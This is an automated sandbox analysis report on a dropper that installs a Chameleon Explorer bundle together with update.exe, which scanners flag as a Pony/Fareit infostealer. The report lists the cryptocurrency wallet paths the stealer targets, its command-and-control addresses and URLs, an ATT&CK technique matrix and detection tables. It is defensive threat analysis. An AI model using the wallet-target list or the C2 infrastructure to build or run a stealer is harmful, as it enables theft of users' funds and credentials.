                    Source: cexplorer.exe, 00000001.00000002.1948284743.0000000002981000.00000020.00000001.01000000.0000000F.sdmp, cexplorer.tmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmpBinary or memory string: Shell_TrayWnd
                    Source: ChameleonFolder.exe, is-JAVSO.tmp.2.drBinary or memory string: Progman
                    Source: cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000000.1854728343.0000000000418000.00000020.00000001.01000000.0000000E.sdmpBinary or memory string: GetTaskbarPositionShell_TrayWnd
                    Source: cexplorer.exe, 00000001.00000002.1948284743.0000000002981000.00000020.00000001.01000000.0000000F.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmpBinary or memory string: ProgmanU
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_03555618 cpuid 2_2_03555618
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: GetUserDefaultUILanguage,GetLocaleInfoW,2_2_0355A63C
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_03559ADC
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: GetLocaleInfoW,2_2_0356A948
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: GetLocaleInfoW,2_2_0356A8FC
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,20_2_03330460
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,20_2_0332F480
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: GetLocaleInfoA,21_2_00404BA8
                    Source: C:\Users\user\AppData\Roaming\update.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeCode function: 0_2_004150D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004150D7
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_004065F0 GetUserNameW,21_2_004065F0
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_004167B4 GetTimeZoneInformation,21_2_004167B4
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_035E735C GetVersionExW,2_2_035E735C
                    Source: C:\Users\user\AppData\Roaming\update.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_004186E421_2_004186E4
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_004186E421_2_004186E4
                    Source: Yara matchFile source: 21.2.update.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.update.exe.29d6000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.update.exe.29d6000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: update.exe PID: 4320, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: update.exe PID: 6332, type: MEMORYSTR
                    Source: Yara matchFile source: 21.2.update.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.update.exe.29d6000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.update.exe.29d6000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: update.exe PID: 4320, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: update.exe PID: 6332, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: update.exe PID: 4320, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: update.exe PID: 6332, type: MEMORYSTR
                    Source: update.exe, 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: electrum.dat
                    Source: update.exe, 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: *6%appdata%\Electrum\wallets\$Coins\Electrum-LTC>%appdata%\Electrum-LTC\wallets\
                    Source: update.exe, 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: *.json,*.seco"%APPDATA%\Exodus\2Coins\Jaxx\Local Storage\:%APPDATA%\Jaxx\Local Storage\ Coins\MultiBitHDpmbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml*%APPDATA%\MultiBitHD\
                    Source: update.exe, 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: *.json,*.seco"%APPDATA%\Exodus\2Coins\Jaxx\Local Storage\:%APPDATA%\Jaxx\Local Storage\ Coins\MultiBitHDpmbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml*%APPDATA%\MultiBitHD\
                    Source: update.exe, 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: *.json,*.seco"%APPDATA%\Exodus\2Coins\Jaxx\Local Storage\:%APPDATA%\Jaxx\Local Storage\ Coins\MultiBitHDpmbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml*%APPDATA%\MultiBitHD\
                    Source: update.exe, 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: UTC*8%APPDATA%\Ethereum\keystore\
                    Source: update.exe, 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: Coins\Exodus
                    Source: update.exe, 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: Coins\Ethereum
                    Source: update.exe, 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: UTC*8%APPDATA%\Ethereum\keystore\
                    Source: update.exe, 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: *6%appdata%\Electrum\wallets\$Coins\Electrum-LTC>%appdata%\Electrum-LTC\wallets\
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    1
                    Deobfuscate/Decode Files or Information
                    21
                    Input Capture
                    2
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    2
                    Ingress Tool Transfer
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts2
                    Native API
                    1
                    Scheduled Task/Job
                    12
                    Process Injection
                    3
                    Obfuscated Files or Information
                    LSASS Memory1
                    Account Discovery
                    Remote Desktop Protocol1
                    Data from Local System
                    21
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Scheduled Task/Job
                    111
                    Registry Run Keys / Startup Folder
                    1
                    Scheduled Task/Job
                    11
                    Software Packing
                    Security Account Manager3
                    File and Directory Discovery
                    SMB/Windows Admin Shares21
                    Input Capture
                    3
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook111
                    Registry Run Keys / Startup Folder
                    1
                    DLL Side-Loading
                    NTDS157
                    System Information Discovery
                    Distributed Component Object ModelInput Capture14
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                    Masquerading
                    LSA Secrets341
                    Security Software Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Virtualization/Sandbox Evasion
                    Cached Domain Credentials1
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                    Process Injection
                    DCSync3
                    Process Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                    Application Window Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow3
                    System Owner/User Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583137 Sample: ETVk1yP43q.exe Startdate: 02/01/2025 Architecture: WINDOWS Score: 100 81 www.chameleon-managers.com 2->81 83 neosoft-activator.appspot.com 2->83 85 2 other IPs or domains 2->85 93 Suricata IDS alerts for network traffic 2->93 95 Malicious sample detected (through community Yara rule) 2->95 97 Antivirus detection for URL or domain 2->97 99 8 other signatures 2->99 9 ETVk1yP43q.exe 1 5 2->9         started        14 ChameleonFolder.exe 7 31 2->14         started        16 ChameleonExplorer.exe 2->16         started        18 6 other processes 2->18 signatures3 process4 dnsIp5 87 2no.co 104.21.79.229, 443, 49730 CLOUDFLARENETUS United States 9->87 61 C:\Users\user\AppData\Roaming\update.exe, PE32 9->61 dropped 63 C:\Users\user\AppData\Roaming\cexplorer.exe, PE32 9->63 dropped 65 C:\Users\user\AppData\Local\...\aut5826.tmp, PE32 9->65 dropped 111 Binary is likely a compiled AutoIt script file 9->111 20 cexplorer.exe 2 9->20         started        23 update.exe 1 9->23         started        67 C:\...xplorerHelper64.dll_backup, PE32+ 14->67 dropped 69 C:\...xplorerHelper64.dll, PE32+ 14->69 dropped 113 Creates multiple autostart registry keys 14->113 26 ChameleonFolder64.exe 14->26         started        28 ChameleonFolder.exe 16->28         started        file6 signatures7 process8 file9 47 C:\Users\user\AppData\Local\...\cexplorer.tmp, PE32 20->47 dropped 30 cexplorer.tmp 33 26 20->30         started        101 Antivirus detection for dropped file 23->101 103 Multi AV Scanner detection for dropped file 23->103 105 Detected unpacking (changes PE section rights) 23->105 107 4 other signatures 23->107 33 update.exe 23->33         started        signatures10 process11 dnsIp12 71 C:\...\unins000.exe (copy), PE32 30->71 dropped 73 C:\Program Files (x86)\...\is-SCGGO.tmp, PE32+ 30->73 dropped 75 C:\Program Files (x86)\...\is-OJNBS.tmp, PE32 30->75 dropped 77 14 other files (13 malicious) 30->77 dropped 36 ChameleonFolder.exe 1 13 30->36         started        39 ChameleonExplorer.exe 2 2 30->39         started        41 ChameleonExplorer.exe 44 30->41         started        44 ChameleonExplorer.exe 9 6 30->44         started        79 92.63.192.63, 49854, 49858, 49866 ITDELUXE-ASRU Russian Federation 33->79 file13 process14 dnsIp15 49 C:\...\Folder64.dll_backup, PE32+ 36->49 dropped 51 C:\Program Files (x86)\...\Folder64.dll, PE32+ 36->51 dropped 53 C:\Program Files (x86)\...\Folder.dll_backup, PE32 36->53 dropped 55 C:\Program Files (x86)\...\Folder.dll, PE32 36->55 dropped 57 C:\...xplorerHelper32.dll_backup, PE32 39->57 dropped 59 C:\...xplorerHelper32.dll, PE32 39->59 dropped 109 Creates multiple autostart registry keys 41->109 89 ghs.googlehosted.com 142.250.185.115, 49731, 49739, 80 GOOGLEUS United States 44->89 91 neosoft-activator.appspot.com 172.217.16.212, 443, 49732 GOOGLEUS United States 44->91 file16 signatures17

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    ETVk1yP43q.exe68%ReversingLabsWin32.Infostealer.Pony
                    ETVk1yP43q.exe60%VirustotalBrowse
                    ETVk1yP43q.exe100%AviraTR/Dropper.VB.aqjnr
                    ETVk1yP43q.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\update.exe100%AviraHEUR/AGEN.1362414
                    C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe (copy)0%ReversingLabs
                    C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe (copy)2%ReversingLabs
                    C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe (copy)0%ReversingLabs
                    C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll3%ReversingLabs
                    C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backup3%ReversingLabs
                    C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_new (copy)3%ReversingLabs
                    C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll0%ReversingLabs
                    C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_backup0%ReversingLabs
                    C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_new (copy)0%ReversingLabs
                    C:\Program Files (x86)\Chameleon Explorer\Folder.dll3%ReversingLabs
                    C:\Program Files (x86)\Chameleon Explorer\Folder.dll_backup3%ReversingLabs
                    C:\Program Files (x86)\Chameleon Explorer\Folder.dll_new (copy)3%ReversingLabs
                    C:\Program Files (x86)\Chameleon Explorer\Folder64.dll3%ReversingLabs
                    C:\Program Files (x86)\Chameleon Explorer\Folder64.dll_backup3%ReversingLabs
                    C:\Program Files (x86)\Chameleon Explorer\Folder64.dll_new (copy)3%ReversingLabs
                    C:\Program Files (x86)\Chameleon Explorer\is-29AV0.tmp2%ReversingLabs
                    C:\Program Files (x86)\Chameleon Explorer\is-32DE6.tmp3%ReversingLabs
                    C:\Program Files (x86)\Chameleon Explorer\is-F1F8N.tmp3%ReversingLabs
                    C:\Program Files (x86)\Chameleon Explorer\is-GJT7J.tmp0%ReversingLabs
                    C:\Program Files (x86)\Chameleon Explorer\is-JAVSO.tmp3%ReversingLabs
                    C:\Program Files (x86)\Chameleon Explorer\is-KSQ9G.tmp0%ReversingLabs
                    C:\Program Files (x86)\Chameleon Explorer\is-OJNBS.tmp3%ReversingLabs
                    C:\Program Files (x86)\Chameleon Explorer\is-SCGGO.tmp0%ReversingLabs
                    C:\Program Files (x86)\Chameleon Explorer\unins000.exe (copy)3%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\aut5826.tmp2%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp3%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-N60P6.tmp\_isetup\_setup64.tmp0%ReversingLabs
                    C:\Users\user\AppData\Roaming\cexplorer.exe2%ReversingLabs
                    C:\Users\user\AppData\Roaming\update.exe79%ReversingLabsWin32.Infostealer.Fareit
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://92.63.192.63/0%Avira URL Cloudsafe
                    http://92.63.192.63/index.html0%Avira URL Cloudsafe
                    https://dotbit.me/a/0%Avira URL Cloudsafe
                    https://2no.co/1dHC37100%Avira URL Cloudmalware
                    http://www.chameleon-managers.comc0%Avira URL Cloudsafe
                    http://www.chameleon-managers.com/subscription/?action=extend&key=0%Avira URL Cloudsafe
                    https://neosoft-activator.appspot.com/0%Avira URL Cloudsafe
                    http://www.chameleon-managers.coms0%Avira URL Cloudsafe
                    https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;background-repeat:no-rep0%Avira URL Cloudsafe
                    http://www.chameleon-managers.com/info/versions/0%Avira URL Cloudsafe
                    http://www.chameleon-managers.comBhttp://www.chameleon-managers.comBhttp://www.chameleon-managers.co0%Avira URL Cloudsafe
                    http://www.chameleon-managers.com/info/versions/k0%Avira URL Cloudsafe
                    http://www.chameleon-managers.com/reg.php?program=0%Avira URL Cloudsafe
                    http://www.chameleon-managers.com3t0%Avira URL Cloudsafe
                    http://www.chameleon-managers.comsK0%Avira URL Cloudsafe
                    http://www.chameleon-managers.comQN0%Avira URL Cloudsafe
                    http://www.chameleon-managers.comH0%Avira URL Cloudsafe
                    http://counter-strike.com.ua/0%Avira URL Cloudsafe
                    http://www.chameleon-managers.com/subscription/?action=latest&key=0%Avira URL Cloudsafe
                    https://neosoft-activator.appspot.com/vB0%Avira URL Cloudsafe
                    http://www.palkornel.hu/innosetup%10%Avira URL Cloudsafe
                    http://www.chameleon-managers.com3_lmPlmP0%Avira URL Cloudsafe
                    http://92.63.192.63/index.php100%Avira URL Cloudmalware
                    http://www.chameleon-managers.com3Y4=A4=AhXInno0%Avira URL Cloudsafe
                    http://www.chameleon-managers.com/contacts.php?program=0%Avira URL Cloudsafe
                    https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;z0%Avira URL Cloudsafe
                    http://www.chameleon-managers.com0%Avira URL Cloudsafe
                    https://2no.co/redirect-100%Avira URL Cloudmalware
                    http://ocsp.startssl.com070%Avira URL Cloudsafe
                    http://www.chameleon-managers.com3j0%Avira URL Cloudsafe
                    http://92.63.192.63/index.phpv0%Avira URL Cloudsafe
                    https://cdn.iplogger.org/favicon.ico0%Avira URL Cloudsafe
                    http://www.chameleon-managers.com3h0%Avira URL Cloudsafe
                    http://ocsp.startssl.com000%Avira URL Cloudsafe
                    http://www.chameleon-managers.com3l0%Avira URL Cloudsafe
                    http://www.chameleon-managers.com3f0%Avira URL Cloudsafe
                    http://www.chameleon-managers.com/contacts.php?utm_source=program&utm_medium=question&utm_campaign=0%Avira URL Cloudsafe
                    http://www.chameleon-managers.com3c0%Avira URL Cloudsafe
                    http://www.chameleon-managers.com3g0%Avira URL Cloudsafe
                    https://2no.co/1dHC37B100%Avira URL Cloudmalware
                    http://www.chameleon-managers.com30%Avira URL Cloudsafe
                    http://www.chameleon-managers.com3d0%Avira URL Cloudsafe
                    http://www.chameleon-managers.com3e0%Avira URL Cloudsafe
                    http://92.63.192.63/index.phpmswsock.dll.mui0%Avira URL Cloudsafe
                    http://92.63.192.63/index.htmlb0%Avira URL Cloudsafe
                    https://2no.co:443/1dHC37Users100%Avira URL Cloudmalware
                    http://92.63.192.63/index.html_0%Avira URL Cloudsafe
                    http://www.chameleon-managers.comSQ0%Avira URL Cloudsafe
                    http://www.chameleon-managers.com/00%Avira URL Cloudsafe
                    https://neosoft-activator.appspot.com/activation/4/?h_id=75254DF3C66AB052045780D3C643713C-1B3D82FF200%Avira URL Cloudsafe
                    http://92.63.192.63/index.phpM0%Avira URL Cloudsafe
                    http://www.chameleon-managers.com3V$mP$mP0%Avira URL Cloudsafe
                    https://2no.co/100%Avira URL Cloudmalware
                    http://crl.u0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    2no.co
                    104.21.79.229
                    truefalse
                      unknown
                      ghs.googlehosted.com
                      142.250.185.115
                      truefalse
                        high
                        neosoft-activator.appspot.com
                        172.217.16.212
                        truefalse
                          unknown
                          www.chameleon-managers.com
                          unknown
                          unknowntrue
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            http://92.63.192.63/index.htmltrue
                            • Avira URL Cloud: safe
                            unknown
                            https://2no.co/1dHC37true
                            • Avira URL Cloud: malware
                            unknown
                            http://www.chameleon-managers.com/info/versions/false
                            • Avira URL Cloud: safe
                            unknown
                            http://92.63.192.63/index.phptrue
                            • Avira URL Cloud: malware
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://92.63.192.63/update.exe, 00000015.00000003.2470147501.0000000000777000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000003.2482146112.0000000000772000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000002.2483935326.0000000000772000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://neosoft-activator.appspot.com/ChameleonExplorer.exe, 00000004.00000002.1831169359.00000000014C7000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUcexplorer.exe, 00000001.00000000.1719947136.0000000000401000.00000020.00000001.01000000.00000005.sdmp, cexplorer.exe.0.drfalse
                              high
                              http://aia.startssl.com/certs/sca.code2.crt06cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.drfalse
                                high
                                http://ip-api.com/jsonupdate.exe, update.exe, 00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmp, update.exe, 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmpfalse
                                  high
                                  http://www.chameleon-managers.comccexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://dotbit.me/a/update.exe, update.exe, 00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmp, update.exe, 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://iplogger.org/ETVk1yP43q.exe, 00000000.00000002.1796862019.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1755851564.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1778424639.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797004863.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777057613.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797114581.0000000004C9A000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;background-repeat:no-repETVk1yP43q.exe, 00000000.00000003.1755851564.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777057613.0000000004C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.chameleon-managers.com/subscription/?action=extend&key=ChameleonExplorer.exe, 00000004.00000000.1746141288.0000000000429000.00000020.00000001.01000000.0000000C.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.chameleon-managers.comscexplorer.exe, 00000001.00000003.1945646507.00000000020F6000.00000004.00001000.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://crl.startssl.com/sfsca.crl0fcexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.drfalse
                                      high
                                      https://api.ipify.orgETVk1yP43q.exe, 00000000.00000003.1782637071.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1755737499.0000000004AB2000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1783160385.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1796392614.0000000004AB9000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://www.chameleon-managers.com/info/versions/kChameleonExplorer.exe, 0000000F.00000003.2004458585.0000000003F71000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.chameleon-managers.comBhttp://www.chameleon-managers.comBhttp://www.chameleon-managers.cocexplorer.exe, 00000001.00000003.1720546422.0000000002370000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1723437714.0000000003200000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://crl.thawte.com/ThawteTimestampingCA.crl0cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.drfalse
                                          high
